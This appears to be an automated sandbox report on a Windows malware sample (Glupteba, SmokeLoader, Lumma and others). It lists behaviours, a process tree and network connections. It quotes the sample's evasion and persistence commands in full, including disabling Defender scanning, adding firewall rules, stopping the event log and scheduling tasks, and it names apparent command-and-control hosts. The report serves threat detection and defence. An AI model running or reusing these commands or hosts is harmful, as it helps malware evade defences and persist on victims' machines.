Malware Analysis Report

2024-11-13 14:08

Sample ID 240227-b5vp5sde24
Target 5cddaacf9782c030db128e3ebfd8f301.exe
SHA256 6d533c8a98cee42c8f797a0b982a0be0da8d7503da8c42e8da10a88bfee9bf23
Tags
glupteba smokeloader pub1 backdoor bootkit dropper evasion loader persistence trojan upx dcrat lumma discovery infostealer rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6d533c8a98cee42c8f797a0b982a0be0da8d7503da8c42e8da10a88bfee9bf23

Threat Level: Known bad

The file 5cddaacf9782c030db128e3ebfd8f301.exe was found to be: Known bad.

Malicious Activity Summary

glupteba smokeloader pub1 backdoor bootkit dropper evasion loader persistence trojan upx dcrat lumma discovery infostealer rat spyware stealer

DcRat

SmokeLoader

Glupteba payload

Lumma Stealer

Glupteba

Creates new service(s)

Downloads MZ/PE file

Stops running service(s)

Modifies Windows Firewall

Deletes itself

Reads data files stored by FTP clients

Executes dropped EXE

Checks computer location settings

Reads user/profile data of web browsers

UPX packed file

Loads dropped DLL

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Writes to the Master Boot Record (MBR)

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious use of SetWindowsHookEx

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-27 01:44

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-27 01:44

Reported

2024-02-27 01:46

Platform

win7-20240221-en

Max time kernel

59s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Creates new service(s)

persistence

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS = "\"C:\\ProgramData\\Drivers\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\E024.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PHYSICALDRIVE0 C:\Users\Admin\AppData\Local\Temp\E42B.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1996 set thread context of 980 N/A C:\Users\Admin\AppData\Local\Temp\E024.exe C:\Users\Admin\AppData\Local\Temp\E024.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FLFHF.tmp\590.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1256 wrote to memory of 2668 N/A N/A C:\Users\Admin\AppData\Local\Temp\CF50.exe
PID 1256 wrote to memory of 2668 N/A N/A C:\Users\Admin\AppData\Local\Temp\CF50.exe
PID 1256 wrote to memory of 2668 N/A N/A C:\Users\Admin\AppData\Local\Temp\CF50.exe
PID 1256 wrote to memory of 2668 N/A N/A C:\Users\Admin\AppData\Local\Temp\CF50.exe
PID 2668 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\CF50.exe C:\Windows\SysWOW64\WerFault.exe
PID 2668 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\CF50.exe C:\Windows\SysWOW64\WerFault.exe
PID 2668 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\CF50.exe C:\Windows\SysWOW64\WerFault.exe
PID 2668 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\CF50.exe C:\Windows\SysWOW64\WerFault.exe
PID 1256 wrote to memory of 2416 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1256 wrote to memory of 2416 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1256 wrote to memory of 2416 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1256 wrote to memory of 2416 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1256 wrote to memory of 2416 N/A N/A C:\Windows\system32\regsvr32.exe
PID 2416 wrote to memory of 2456 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2456 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2456 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2456 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2456 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2456 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2456 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1256 wrote to memory of 1996 N/A N/A C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1256 wrote to memory of 1996 N/A N/A C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1256 wrote to memory of 1996 N/A N/A C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1256 wrote to memory of 1996 N/A N/A C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1996 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\E024.exe C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1996 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\E024.exe C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1996 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\E024.exe C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1996 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\E024.exe C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1996 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\E024.exe C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1996 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\E024.exe C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1996 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\E024.exe C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1996 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\E024.exe C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1256 wrote to memory of 620 N/A N/A C:\Users\Admin\AppData\Local\Temp\E42B.exe
PID 1256 wrote to memory of 620 N/A N/A C:\Users\Admin\AppData\Local\Temp\E42B.exe
PID 1256 wrote to memory of 620 N/A N/A C:\Users\Admin\AppData\Local\Temp\E42B.exe
PID 1256 wrote to memory of 620 N/A N/A C:\Users\Admin\AppData\Local\Temp\E42B.exe
PID 1996 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\E024.exe C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1256 wrote to memory of 1788 N/A N/A C:\Users\Admin\AppData\Local\Temp\590.exe
PID 1256 wrote to memory of 1788 N/A N/A C:\Users\Admin\AppData\Local\Temp\590.exe
PID 1256 wrote to memory of 1788 N/A N/A C:\Users\Admin\AppData\Local\Temp\590.exe
PID 1256 wrote to memory of 1788 N/A N/A C:\Users\Admin\AppData\Local\Temp\590.exe
PID 1256 wrote to memory of 1788 N/A N/A C:\Users\Admin\AppData\Local\Temp\590.exe
PID 1256 wrote to memory of 1788 N/A N/A C:\Users\Admin\AppData\Local\Temp\590.exe
PID 1256 wrote to memory of 1788 N/A N/A C:\Users\Admin\AppData\Local\Temp\590.exe
PID 1788 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\590.exe C:\Users\Admin\AppData\Local\Temp\is-FLFHF.tmp\590.tmp
PID 1788 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\590.exe C:\Users\Admin\AppData\Local\Temp\is-FLFHF.tmp\590.tmp
PID 1788 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\590.exe C:\Users\Admin\AppData\Local\Temp\is-FLFHF.tmp\590.tmp
PID 1788 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\590.exe C:\Users\Admin\AppData\Local\Temp\is-FLFHF.tmp\590.tmp
PID 1788 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\590.exe C:\Users\Admin\AppData\Local\Temp\is-FLFHF.tmp\590.tmp
PID 1788 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\590.exe C:\Users\Admin\AppData\Local\Temp\is-FLFHF.tmp\590.tmp
PID 1788 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\590.exe C:\Users\Admin\AppData\Local\Temp\is-FLFHF.tmp\590.tmp
PID 1256 wrote to memory of 2364 N/A N/A C:\Users\Admin\AppData\Local\Temp\3307.exe
PID 1256 wrote to memory of 2364 N/A N/A C:\Users\Admin\AppData\Local\Temp\3307.exe
PID 1256 wrote to memory of 2364 N/A N/A C:\Users\Admin\AppData\Local\Temp\3307.exe
PID 1256 wrote to memory of 2364 N/A N/A C:\Users\Admin\AppData\Local\Temp\3307.exe
PID 2364 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\3307.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 2364 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\3307.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 2364 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\3307.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 2364 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\3307.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 2364 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\3307.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 2364 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\3307.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 2364 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\3307.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 2364 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\3307.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 2364 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\3307.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe

"C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe"

C:\Users\Admin\AppData\Local\Temp\CF50.exe

C:\Users\Admin\AppData\Local\Temp\CF50.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 124

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\D911.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\D911.dll

C:\Users\Admin\AppData\Local\Temp\E024.exe

C:\Users\Admin\AppData\Local\Temp\E024.exe

C:\Users\Admin\AppData\Local\Temp\E024.exe

C:\Users\Admin\AppData\Local\Temp\E024.exe

C:\Users\Admin\AppData\Local\Temp\E42B.exe

C:\Users\Admin\AppData\Local\Temp\E42B.exe

C:\Users\Admin\AppData\Local\Temp\590.exe

C:\Users\Admin\AppData\Local\Temp\590.exe

C:\Users\Admin\AppData\Local\Temp\is-FLFHF.tmp\590.tmp

"C:\Users\Admin\AppData\Local\Temp\is-FLFHF.tmp\590.tmp" /SL5="$201F6,2424585,54272,C:\Users\Admin\AppData\Local\Temp\590.exe"

C:\Users\Admin\AppData\Local\Temp\3307.exe

C:\Users\Admin\AppData\Local\Temp\3307.exe

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe"

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

"C:\Users\Admin\AppData\Local\Temp\FourthX.exe"

C:\Users\Admin\AppData\Local\Temp\4705.exe

C:\Users\Admin\AppData\Local\Temp\4705.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\nsz66C1.tmp

C:\Users\Admin\AppData\Local\Temp\nsz66C1.tmp

C:\Users\Admin\AppData\Local\Temp\7DBF.exe

C:\Users\Admin\AppData\Local\Temp\7DBF.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 124

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240227014540.log C:\Windows\Logs\CBS\CbsPersist_20240227014540.cab

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "UTIXDCVF"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "UTIXDCVF"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\explorer.exe

explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 selebration17io.io udp
RU 91.215.85.120:80 selebration17io.io tcp
US 8.8.8.8:53 joly.bestsup.su udp
US 172.67.171.112:80 joly.bestsup.su tcp
DE 185.172.128.19:80 185.172.128.19 tcp
FR 91.121.181.6:9001 tcp
DE 167.86.94.107:9001 tcp
US 8.8.8.8:53 trmpc.com udp
ES 188.26.207.181:19001 tcp
PA 200.46.202.73:80 trmpc.com tcp
DE 185.172.128.90:80 185.172.128.90 tcp
DE 185.172.128.127:80 185.172.128.127 tcp
N/A 127.0.0.1:49312 tcp
AT 109.70.100.29:443 tcp
US 154.35.175.225:443 tcp
NL 195.189.96.148:443 tcp
DE 185.172.128.145:80 185.172.128.145 tcp
CA 199.58.81.140:443 tcp
FR 87.98.242.239:443 tcp
CZ 87.236.195.216:80 tcp
CZ 87.236.195.216:80 tcp
FR 87.98.242.239:443 tcp
US 8.8.8.8:53 kamsmad.com udp
CO 186.147.159.149:80 kamsmad.com tcp
CO 186.147.159.149:80 kamsmad.com tcp
CO 186.147.159.149:80 kamsmad.com tcp
US 8.8.8.8:53 forum.one-teams.com udp
US 8.8.8.8:53 forum.one-teams.com udp
US 8.8.8.8:53 tansiq.mod.gov.eg udp
US 8.8.8.8:53 tansiq.mod.gov.eg udp
US 8.8.8.8:53 voterportal.eci.gov.in udp
US 8.8.8.8:53 playone1.com udp
US 8.8.8.8:53 myp508.com udp
US 8.8.8.8:53 m.forzza.com udp
US 8.8.8.8:53 my.wizardingworld.com udp
US 8.8.8.8:53 voterportal.eci.gov.in udp
US 8.8.8.8:53 voterportal.eci.gov.in udp
US 8.8.8.8:53 playone1.com udp
US 8.8.8.8:53 voterportal.eci.gov.in udp
US 8.8.8.8:53 myp508.com udp
US 8.8.8.8:53 m.forzza.com udp
US 8.8.8.8:53 myp508.com udp
CO 186.147.159.149:80 kamsmad.com tcp
US 8.8.8.8:53 mestermc.hu udp
US 8.8.8.8:53 my.wizardingworld.com udp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
US 8.8.8.8:53 mestermc.hu udp
US 8.8.8.8:53 passport.twitch.tv udp
US 103.224.212.215:21 myp508.com tcp
US 8.8.8.8:53 coincommunity.com udp
HU 94.125.176.47:21 mestermc.hu tcp
NL 37.48.65.152:22 forum.one-teams.com tcp
US 104.18.13.241:443 m.forzza.com tcp
GB 18.245.218.127:21 my.wizardingworld.com tcp
GB 18.245.218.127:443 my.wizardingworld.com tcp
US 8.8.8.8:53 paidtask.in udp
US 8.8.8.8:53 passport.twitch.tv udp
US 8.8.8.8:53 park-mx.above.com udp
US 8.8.8.8:53 coincommunity.com udp
US 8.8.8.8:53 passport.twitch.tv udp
US 8.8.8.8:53 passport.twitch.tv udp
US 8.8.8.8:53 passport.twitch.tv udp
US 8.8.8.8:53 passport.twitch.tv udp
EG 62.117.41.16:995 tansiq.mod.gov.eg tcp
US 8.8.8.8:53 paidtask.in udp
GB 18.245.218.127:143 my.wizardingworld.com tcp
US 8.8.8.8:53 mx3.zoho.eu udp
US 8.8.8.8:53 mx3.zoho.eu udp
US 8.8.8.8:53 account.protonvpn.com udp
US 8.8.8.8:53 servsafe.com udp
HU 94.125.176.47:443 mestermc.hu tcp
US 50.28.72.26:22 coincommunity.com tcp
US 8.8.8.8:53 servsafe.com udp
US 8.8.8.8:53 servsafe.com udp
US 104.18.13.241:995 m.forzza.com tcp
US 104.18.13.241:143 m.forzza.com tcp
US 104.18.13.241:465 m.forzza.com tcp
GB 18.245.218.127:995 my.wizardingworld.com tcp
US 199.59.243.225:465 playone1.com tcp
IN 117.239.179.130:143 voterportal.eci.gov.in tcp
US 50.28.72.26:21 coincommunity.com tcp
US 199.59.243.225:143 playone1.com tcp
US 103.224.212.215:80 myp508.com tcp
US 104.18.13.241:80 m.forzza.com tcp
US 103.224.212.34:143 park-mx.above.com tcp
GB 18.245.218.127:80 my.wizardingworld.com tcp
US 103.224.212.34:465 park-mx.above.com tcp
NL 37.48.65.152:21 forum.one-teams.com tcp
US 199.59.243.225:80 playone1.com tcp
US 8.8.8.8:53 account.protonvpn.com udp
US 8.8.8.8:53 mx2.emailsrvr.com udp
GB 18.245.218.127:465 my.wizardingworld.com tcp
US 8.8.8.8:53 portal.essor.com.br udp
GB 18.245.187.125:22 passport.twitch.tv tcp
US 103.224.212.34:995 park-mx.above.com tcp
IN 117.239.179.130:465 voterportal.eci.gov.in tcp
US 50.28.72.26:443 coincommunity.com tcp
GB 18.245.218.93:21 my.wizardingworld.com tcp
GB 18.245.187.83:21 passport.twitch.tv tcp
HU 94.125.176.47:80 mestermc.hu tcp
US 199.59.243.225:995 playone1.com tcp
GB 18.245.187.7:443 passport.twitch.tv tcp
GB 18.245.187.83:143 passport.twitch.tv tcp
DE 185.159.159.143:22 account.protonvpn.com tcp
IN 117.239.179.130:995 voterportal.eci.gov.in tcp
US 104.18.13.241:80 m.forzza.com tcp
NL 185.230.212.166:143 mx3.zoho.eu tcp
GB 18.245.187.7:80 passport.twitch.tv tcp
US 8.8.8.8:53 aluno.seduc.ce.gov.br udp
NL 185.230.212.166:465 mx3.zoho.eu tcp
US 68.142.70.44:22 servsafe.com tcp
GB 18.245.218.93:143 my.wizardingworld.com tcp
US 68.142.70.44:21 servsafe.com tcp
IN 117.239.179.130:80 voterportal.eci.gov.in tcp
GB 18.245.187.7:465 passport.twitch.tv tcp
NL 185.230.212.166:995 mx3.zoho.eu tcp
US 104.18.12.241:143 m.forzza.com tcp
GB 18.245.187.7:995 passport.twitch.tv tcp
US 173.203.187.2:143 mx2.emailsrvr.com tcp
DE 185.159.159.143:21 account.protonvpn.com tcp
HU 94.125.176.47:21 mestermc.hu tcp
DE 185.159.159.143:443 account.protonvpn.com tcp
GB 18.245.218.127:80 my.wizardingworld.com tcp
GB 18.245.218.80:21 my.wizardingworld.com tcp
US 104.18.12.241:465 m.forzza.com tcp
GB 18.245.187.7:22 passport.twitch.tv tcp
GB 18.245.218.93:465 my.wizardingworld.com tcp
US 8.8.8.8:53 portal.essor.com.br udp
US 8.8.8.8:53 auth.riotgames.com udp
US 8.8.8.8:53 aluno.seduc.ce.gov.br udp
US 8.8.8.8:53 ww25.myp508.com udp
US 8.8.8.8:53 portal.essor.com.br udp
US 104.18.12.241:995 m.forzza.com tcp
GB 18.245.218.93:995 my.wizardingworld.com tcp
GB 18.245.218.80:143 my.wizardingworld.com tcp
US 8.8.8.8:53 auth.riotgames.com udp
GB 18.245.187.75:21 passport.twitch.tv tcp
US 8.8.8.8:53 mx.servsafe.com udp
GB 18.245.187.75:143 passport.twitch.tv tcp
US 173.203.187.2:465 mx2.emailsrvr.com tcp
US 104.18.13.241:443 m.forzza.com tcp
DE 185.159.159.143:143 account.protonvpn.com tcp
GB 18.245.187.75:995 passport.twitch.tv tcp
US 8.8.8.8:53 s.activision.com udp
US 8.8.8.8:53 signup.tr.leagueoflegends.com udp
US 8.8.8.8:53 signup.tr.leagueoflegends.com udp
CO 186.147.159.149:80 kamsmad.com tcp
GB 18.245.187.75:465 passport.twitch.tv tcp
US 50.28.72.26:80 coincommunity.com tcp
US 68.142.70.44:443 servsafe.com tcp
US 173.203.187.2:995 mx2.emailsrvr.com tcp
NL 37.48.65.152:22 forum.one-teams.com tcp
US 199.59.243.225:80 ww25.myp508.com tcp
US 103.224.212.215:80 myp508.com tcp
US 45.60.64.42:22 portal.essor.com.br tcp
HU 94.125.176.47:80 mestermc.hu tcp
BR 177.71.235.216:22 aluno.seduc.ce.gov.br tcp
US 104.16.120.50:22 auth.riotgames.com tcp
US 103.224.212.34:143 park-mx.above.com tcp
BR 177.71.235.216:21 aluno.seduc.ce.gov.br tcp
DE 185.159.159.143:465 account.protonvpn.com tcp
DE 185.159.159.143:80 account.protonvpn.com tcp
US 38.98.152.194:465 mx.servsafe.com tcp
US 103.224.212.34:465 park-mx.above.com tcp
BR 177.71.235.216:443 aluno.seduc.ce.gov.br tcp
GB 18.245.187.7:443 passport.twitch.tv tcp
US 45.60.64.42:21 portal.essor.com.br tcp
US 45.60.64.42:443 portal.essor.com.br tcp
GB 18.245.187.7:80 passport.twitch.tv tcp
US 50.28.72.26:80 coincommunity.com tcp
GB 18.245.218.127:443 my.wizardingworld.com tcp
NL 37.48.65.152:21 forum.one-teams.com tcp
DE 185.159.159.143:80 account.protonvpn.com tcp
DE 185.159.159.143:995 account.protonvpn.com tcp
US 45.60.64.42:143 portal.essor.com.br tcp
US 8.8.8.8:53 bbolen2.solcreative.ca udp
EG 62.117.41.16:22 tansiq.mod.gov.eg tcp
US 38.98.152.194:143 mx.servsafe.com tcp
HU 94.125.176.47:443 mestermc.hu tcp
US 104.16.120.50:21 auth.riotgames.com tcp
US 50.28.72.26:80 coincommunity.com tcp
GB 18.135.83.51:22 signup.tr.leagueoflegends.com tcp
US 103.224.212.34:995 park-mx.above.com tcp
US 104.16.119.50:22 auth.riotgames.com tcp
US 8.8.8.8:53 s.activision.com udp
US 8.8.8.8:53 bbolen2.solcreative.ca udp
US 8.8.8.8:53 e.batelco.com udp
US 103.224.212.215:21 myp508.com tcp
US 104.18.13.241:143 m.forzza.com tcp
US 68.142.70.44:80 servsafe.com tcp
US 38.98.152.194:995 mx.servsafe.com tcp
